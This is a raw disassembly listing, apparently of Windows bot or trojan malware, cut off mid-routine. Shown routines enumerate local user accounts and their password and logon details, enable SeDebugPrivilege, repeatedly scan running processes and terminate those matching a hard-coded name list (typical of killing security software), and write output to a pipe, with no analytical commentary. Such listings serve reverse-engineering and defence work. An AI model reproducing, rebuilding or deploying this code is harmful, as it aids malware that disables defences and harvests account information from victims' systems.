push offset unk_450514
push esi
call sub_41EA60
add esp, 0Ch
loc_419B11: ; CODE XREF: sub_419A4D+7B�j
; sub_419A4D+A2�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_419A4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B18 proc near ; CODE XREF: sub_419A4D+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_4198C8
push [ebp+arg_4]
mov edi, eax
call sub_4198C8
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_4198C8
add esp, 0Ch
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
lea ecx, [ebp+var_4]
mov [ebp+var_20], eax
xor eax, eax
push ecx
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call ds:dword_4E2EA0
pop edi
leave
retn
sub_419B18 endp
; =============== S U B R O U T I N E =======================================
sub_419B72 proc near ; CODE XREF: sub_419A4D+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_4198C8
push [esp+8+arg_4]
mov esi, eax
call sub_4198C8
pop ecx
pop ecx
push eax
push esi
call ds:dword_4E2E90
pop esi
retn
sub_419B72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B93 proc near ; CODE XREF: sub_419A4D+2D�p
var_204 = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_4198C8
push [ebp+arg_4]
mov esi, eax
call sub_4198C8
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call ds:dword_4E3020
test eax, eax
mov [ebp+arg_0], eax
jnz loc_419F20
mov eax, [ebp+var_4]
test eax, eax
jz loc_419F5B
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_204]
push offset aAccountS ; "Account: %S"
push eax
call sub_41EA60
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_204]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_204]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_204]
push offset aCommentS ; "Comment: %S"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
add esp, 40h
mov eax, [eax+10h]
sub eax, 0
jz short loc_419CAC
dec eax
jz short loc_419CA5
dec eax
jz short loc_419C9E
mov eax, offset aUnknown_2 ; "Unknown"
jmp short loc_419CB1
; ---------------------------------------------------------------------------
loc_419C9E: ; CODE XREF: sub_419B93+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_419CB1
; ---------------------------------------------------------------------------
loc_419CA5: ; CODE XREF: sub_419B93+FF�j
mov eax, offset aUser_3 ; "User"
jmp short loc_419CB1
; ---------------------------------------------------------------------------
loc_419CAC: ; CODE XREF: sub_419B93+FC�j
mov eax, offset aGuest ; "Guest"
loc_419CB1: ; CODE XREF: sub_419B93+109�j
; sub_419B93+110�j ...
push eax
lea eax, [ebp+var_204]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_204]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_204]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_204]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_204]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_204]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_204]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_204]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_204]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_204]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_204]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_204]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_204]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_204]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_204]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_204]
push esi
push eax
push edi
push ebx
call sub_409C75
add esp, 20h
pop edi
pop ebx
jmp short loc_419F4C
; ---------------------------------------------------------------------------
loc_419F20: ; CODE XREF: sub_419B93+35�j
push eax
lea eax, [ebp+var_204]
push offset unk_4506C4
push eax
call sub_41EA60
push 0
lea eax, [ebp+var_204]
push [ebp+arg_10]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_409C75
add esp, 20h
loc_419F4C: ; CODE XREF: sub_419B93+38B�j
cmp [ebp+var_4], 0
jz short loc_419F5B
push [ebp+var_4]
call ds:dword_4E3058
loc_419F5B: ; CODE XREF: sub_419B93+40�j
; sub_419B93+3BD�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_419B93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419F61 proc near ; CODE XREF: sub_401C87+47A6�p
var_218 = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_4198C8
push esi
mov [ebp+var_14], eax
push [ebp+arg_8]
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 18h
loc_419FA0: ; CODE XREF: sub_419F61+12B�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call ds:dword_4E2F28
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_41A001
cmp eax, 0EAh
jz short loc_41A001
push eax
push eax
call sub_41A0D7
pop ecx
push eax
lea eax, [ebp+var_218]
push offset unk_45070C
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 24h
jmp short loc_41A072
; ---------------------------------------------------------------------------
loc_41A001: ; CODE XREF: sub_419F61+62�j
; sub_419F61+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41A085
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_41A072
loc_41A00F: ; CODE XREF: sub_419F61+E9�j
cmp edi, esi
lea eax, [ebp+var_218]
jz short loc_41A04E
push dword ptr [edi]
push offset aS_29 ; " %S"
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_41A00F
jmp short loc_41A072
; ---------------------------------------------------------------------------
loc_41A04E: ; CODE XREF: sub_419F61+B6�j
push offset unk_450738
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 1Ch
loc_41A072: ; CODE XREF: sub_419F61+9E�j
; sub_419F61+AC�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41A085
push edi
call ds:dword_4E3058
xor edi, edi
mov [ebp+var_4], edi
loc_41A085: ; CODE XREF: sub_419F61+A5�j
; sub_419F61+116�j
cmp [ebp+var_C], 0EAh
jz loc_419FA0
cmp edi, esi
jz short loc_41A09D
push edi
call ds:dword_4E3058
loc_41A09D: ; CODE XREF: sub_419F61+133�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_41EA60
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_419F61 endp
; =============== S U B R O U T I N E =======================================
sub_41A0D7 proc near ; CODE XREF: sub_419737+41�p
; sub_41992C+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_41A189
jz loc_41A182
cmp eax, 7Bh
ja short loc_41A14E
jz short loc_41A144
cmp eax, 5
jz short loc_41A13A
cmp eax, 8
jz short loc_41A130
cmp eax, 32h
jz short loc_41A126
cmp eax, 35h
jz short loc_41A11C
cmp eax, 57h
jnz loc_41A1D8
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A11C: ; CODE XREF: sub_41A0D7+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A126: ; CODE XREF: sub_41A0D7+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A130: ; CODE XREF: sub_41A0D7+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A13A: ; CODE XREF: sub_41A0D7+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A144: ; CODE XREF: sub_41A0D7+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A14E: ; CODE XREF: sub_41A0D7+1A�j
sub eax, 7Ch
jz short loc_41A17B
sub eax, 7C8h
jz short loc_41A174
dec eax
jz short loc_41A16A
dec eax
jnz short loc_41A1D8
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A16A: ; CODE XREF: sub_41A0D7+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A174: ; CODE XREF: sub_41A0D7+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A17B: ; CODE XREF: sub_41A0D7+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A182: ; CODE XREF: sub_41A0D7+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A189: ; CODE XREF: sub_41A0D7+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_41A1C2
jz short loc_41A1BB
sub eax, 8ADh
jz short loc_41A1ED
dec eax
dec eax
jz short loc_41A1B4
dec eax
jz short loc_41A1AD
dec eax
dec eax
jnz short loc_41A1D8
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A1AD: ; CODE XREF: sub_41A0D7+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A1B4: ; CODE XREF: sub_41A0D7+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A1BB: ; CODE XREF: sub_41A0D7+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A1C2: ; CODE XREF: sub_41A0D7+B9�j
sub eax, 8CAh
jz short loc_41A1F4
sub eax, 17h
jz short loc_41A1ED
sub eax, 25h
jz short loc_41A1E6
sub eax, 29h
jz short loc_41A1DF
loc_41A1D8: ; CODE XREF: sub_41A0D7+35�j
; sub_41A0D7+87�j ...
push offset aAnUnknownErr_0 ; "An unknown error occurred."
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A1DF: ; CODE XREF: sub_41A0D7+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A1E6: ; CODE XREF: sub_41A0D7+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A1ED: ; CODE XREF: sub_41A0D7+C2�j
; sub_41A0D7+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_41A1F9
; ---------------------------------------------------------------------------
loc_41A1F4: ; CODE XREF: sub_41A0D7+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_41A1F9: ; CODE XREF: sub_41A0D7+40�j
; sub_41A0D7+4A�j ...
push offset dword_4F2BF8
call sub_41EA60
pop ecx
mov eax, offset dword_4F2BF8
pop ecx
retn
sub_41A0D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A20B proc near ; CODE XREF: sub_401C87+47EC�p
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_421E90
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
call ds:dword_4F5394 ; GetComputerNameA
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_421E90
lea eax, [ebp+var_718]
push eax
call sub_421E60
add esp, 10h
add eax, eax
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call ds:dword_4E2FD8
test eax, eax
jnz short loc_41A29B
mov esi, offset dword_4F29F0
push offset unk_450A40
push esi
call sub_41EA60
pop ecx
pop ecx
jmp short loc_41A2C4
; ---------------------------------------------------------------------------
loc_41A29B: ; CODE XREF: sub_41A20B+7A�j
lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_41A0D7
pop ecx
mov esi, offset dword_4F29F0
push eax
push offset dword_450A68
push esi
call sub_41EA60
add esp, 14h
loc_41A2C4: ; CODE XREF: sub_41A20B+8E�j
mov eax, esi
pop esi
leave
retn
sub_41A20B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A2C9 proc near ; CODE XREF: sub_41786C+45�p
; sub_41786C+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_4F53CC ; GetCurrentProcess
push eax
call ds:dword_4E2FAC ; OpenProcessToken
test eax, eax
jnz short loc_41A2E8
leave
retn
; ---------------------------------------------------------------------------
loc_41A2E8: ; CODE XREF: sub_41A2C9+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call ds:dword_4E2F84 ; LookupPrivilegeValueA
test eax, eax
jz short loc_41A326
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_41A30F
or [ebp+var_8], 2
jmp short loc_41A313
; ---------------------------------------------------------------------------
loc_41A30F: ; CODE XREF: sub_41A2C9+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_41A313: ; CODE XREF: sub_41A2C9+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call ds:dword_4E3034 ; AdjustTokenPrivileges
mov esi, eax
loc_41A326: ; CODE XREF: sub_41A2C9+32�j
push [ebp+var_4]
call ds:off_4F533C
mov eax, esi
pop esi
leave
retn
sub_41A2C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A334 proc near ; CODE XREF: sub_401C87+79AB�p
; sub_41A574+74�p ...
var_554 = byte ptr -554h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp ds:dword_4E2FE8, ebx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_41A544
cmp ds:dword_4E2FCC, ebx
jz loc_41A544
cmp ds:dword_4E2EDC, ebx
jz loc_41A544
push 1
push offset aSedebugprivi_1 ; "SeDebugPrivilege"
call sub_41A2C9
pop ecx
pop ecx
push ebx
push 0Fh
call ds:dword_4E2FE8 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_41A537
lea eax, [ebp+var_130]
mov [ebp+var_130], 128h
push eax
push edi
call ds:dword_4E2FCC ; Process32First
mov esi, ds:off_4F533C
test eax, eax
jz loc_41A532
lea eax, [ebp+var_130]
push eax
push edi
call ds:dword_4E2EDC ; Process32Next
test eax, eax
jz loc_41A532
mov edi, ds:dword_4F5358
mov ebx, 1F0FFFh
loc_41A3F8: ; CODE XREF: sub_41A334+1F6�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_41A45C
mov [ebp+var_4], eax
loc_41A402: ; CODE XREF: sub_41A334+F0�j
mov eax, [ebp+var_4]
push ds:off_450BE8[eax]
lea eax, [ebp+var_10C]
push eax
call ds:dword_4F5458 ; lstrcmpi
test eax, eax
jz short loc_41A42B
add [ebp+var_4], 4
cmp [ebp+var_4], 60h
jb short loc_41A402
jmp loc_41A518
; ---------------------------------------------------------------------------
loc_41A42B: ; CODE XREF: sub_41A334+E6�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz loc_41A518
push 0
push eax
call ds:dword_4F53C4 ; TerminateProcess
test eax, eax
jnz loc_41A518
loc_41A452: ; CODE XREF: sub_41A334+1CA�j
push [ebp+var_4]
call esi ; sub_50B3D5
jmp loc_41A518
; ---------------------------------------------------------------------------
loc_41A45C: ; CODE XREF: sub_41A334+C9�j
cmp [ebp+arg_C], eax
jnz loc_41A503
cmp [ebp+arg_4], eax
jz loc_41A518
push [ebp+var_128]
push 8
call ds:dword_4E2FE8 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_41A4C3
lea ecx, [ebp+var_354]
push ecx
push eax
call ds:dword_4E2E88 ; Module32First
push [ebp+var_128]
test eax, eax
jz short loc_41A4B5
lea eax, [ebp+var_234]
push eax
push offset aSD ; " %s (%d)"
jmp short loc_41A4D5
; ---------------------------------------------------------------------------
loc_41A4B5: ; CODE XREF: sub_41A334+171�j
lea eax, [ebp+var_10C]
push eax
push offset aSD_0 ; " %s (%d)"
jmp short loc_41A4D5
; ---------------------------------------------------------------------------
loc_41A4C3: ; CODE XREF: sub_41A334+159�j
push [ebp+var_128]
lea eax, [ebp+var_10C]
push eax
push offset aSD_1 ; " %s (%d)"
loc_41A4D5: ; CODE XREF: sub_41A334+17F�j
; sub_41A334+18D�j
lea eax, [ebp+var_554]
push eax
call sub_41EA60
add esp, 10h
lea eax, [ebp+var_554]
push 1
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
jmp loc_41A452
; ---------------------------------------------------------------------------
loc_41A503: ; CODE XREF: sub_41A334+12B�j
push [ebp+arg_C]
lea eax, [ebp+var_10C]
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_41A54B
loc_41A518: ; CODE XREF: sub_41A334+F2�j
; sub_41A334+107�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call ds:dword_4E2EDC ; Process32Next
test eax, eax
jnz loc_41A3F8
xor ebx, ebx
loc_41A532: ; CODE XREF: sub_41A334+9D�j
; sub_41A334+B3�j
push [ebp+var_8]
call esi ; sub_50B3D5
loc_41A537: ; CODE XREF: sub_41A334+77�j
push ebx
push offset aSedebugprivi_2 ; "SeDebugPrivilege"
call sub_41A2C9
pop ecx
pop ecx
loc_41A544: ; CODE XREF: sub_41A334+3A�j
; sub_41A334+46�j ...
xor eax, eax
loc_41A546: ; CODE XREF: sub_41A334+23E�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41A54B: ; CODE XREF: sub_41A334+1E2�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
push [ebp+var_8]
mov edi, eax
call esi ; sub_50B3D5
push 0
push edi
call ds:dword_4F53C4 ; TerminateProcess
test eax, eax
jnz short loc_41A56F
push edi
call esi ; sub_50B3D5
jmp short loc_41A544
; ---------------------------------------------------------------------------
loc_41A56F: ; CODE XREF: sub_41A334+234�j
xor eax, eax
inc eax
jmp short loc_41A546
sub_41A334 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A574 proc near ; DATA XREF: sub_401C87+2692�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset unk_450C94
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_41EA60
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_41A5D3
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_409C75
add esp, 14h
loc_41A5D3: ; CODE XREF: sub_41A574+3D�j
push [ebp+var_10]
lea eax, [ebp+var_94]
push esi
push esi
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_41A334
add esp, 18h
test eax, eax
lea eax, [ebp+var_298]
jnz short loc_41A601
push offset unk_450CB4
jmp short loc_41A606
; ---------------------------------------------------------------------------
loc_41A601: ; CODE XREF: sub_41A574+84�j
push offset unk_450CD8
loc_41A606: ; CODE XREF: sub_41A574+8B�j
push eax
call sub_41EA60
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_41A633
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_409C75
add esp, 14h
loc_41A633: ; CODE XREF: sub_41A574+9D�j
lea eax, [ebp+var_298]
push eax
call sub_415A3C
push [ebp+var_14]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_41A574 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A652 proc near ; CODE XREF: sub_401C87+7949�p
; sub_40B7CC+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
inc edi
push 0
push 1F0FFFh
call ds:dword_4F5358 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_41A684
push 0
push esi
call ds:dword_4F53C4 ; TerminateProcess
test eax, eax
jnz short loc_41A684
push esi
xor edi, edi
call ds:off_4F533C
loc_41A684: ; CODE XREF: sub_41A652+1A�j
; sub_41A652+27�j
mov eax, edi
pop edi
pop esi
retn
sub_41A652 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_41A689 proc near ; DATA XREF: sub_401404+3B8�o
push esi
xor esi, esi
loc_41A68C: ; CODE XREF: sub_41A689+1E�j
push 1
push esi
push esi
push esi
push esi
push esi
call sub_41A334
add esp, 18h
push ds:dword_450A98
call ds:dword_4F534C ; Sleep
jmp short loc_41A68C
sub_41A689 endp
; =============== S U B R O U T I N E =======================================
sub_41A6A9 proc near ; CODE XREF: sub_41A6D9+2A�p
; sub_41A711+7E�p ...
mov eax, ds:dword_4F3264
push esi
mov esi, ds:off_4F533C
cmp eax, 0FFFFFFFFh
jz short loc_41A6BD
push eax
call esi ; sub_50B3D5
loc_41A6BD: ; CODE XREF: sub_41A6A9+F�j
mov eax, ds:dword_4F326C
cmp eax, 0FFFFFFFFh
jz short loc_41A6CA
push eax
call esi ; sub_50B3D5
loc_41A6CA: ; CODE XREF: sub_41A6A9+1C�j
mov eax, ds:dword_4F3260
cmp eax, 0FFFFFFFFh
jz short loc_41A6D7
push eax
call esi ; sub_50B3D5
loc_41A6D7: ; CODE XREF: sub_41A6A9+29�j
pop esi
retn
sub_41A6A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6D9 proc near ; CODE XREF: sub_401C87+7683�p
; sub_4165C7+14A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_41BC70
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push ds:dword_4F3268
call ds:dword_4F53B4 ; WriteFile
test eax, eax
jnz short loc_41A70C
call sub_41A6A9
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41A70C: ; CODE XREF: sub_41A6D9+28�j
